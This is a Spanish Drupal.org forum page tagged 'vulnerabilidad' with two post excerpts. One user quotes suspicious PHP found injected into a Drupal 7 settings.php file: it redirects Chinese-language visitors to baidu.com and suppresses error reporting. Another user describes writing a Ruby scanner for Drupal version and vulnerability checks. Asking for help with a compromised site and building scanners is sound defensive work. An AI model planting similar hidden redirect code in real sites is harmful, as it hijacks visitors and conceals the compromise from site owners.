vulnerabilidad

We encourage users to post events happening in the community to the community events group on https://www.drupal.org.
jonn59's picture

vulnerada mi instalaciòn de drupal 7

Hola a todos, recurro a ustedes por una situacion de seguridad que se me presento en mi plataforma Drupal 7,

Recientemente habilite un certificado para tener conexiones seguras(Https) pero al ingresar a mi archivo settings.php a realizar unos cambios me lleve la sorpresa de que habia una serie de lineas no propias de la instalación de Drupal, las lineas extrañsa son las siguientes:


<?php
$lan = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if (preg_match ( '/zh-cn/i', $lan)){
$url = 'http://www.baidu.com/';
header("location: " . $url);
exit();
}
error_reporting(0);

Read more
leandro713's picture

Vulnerabilidades drupal

Hola!
en un rato tonto estoy haciendo un escáner en ruby que me indique la versión y vulnerabilidades de un sitio Drupal dado.
me dirijo a vosotros para ver si podemos hacer en común una lista de inseguridades o prácticas no recomendables para chequearlas con mi script y advertir de ellas con él.
No se, así de primeras, creo que los ficheros
CHANGELOG.txt, COPYRIGHT.txt, INSTALL.mysql.txt, etc ...
deberían borrarse (opinión discutible, lo se) ¿se os ocurre alguna idea mas?

Read more
Subscribe with RSS Syndicate content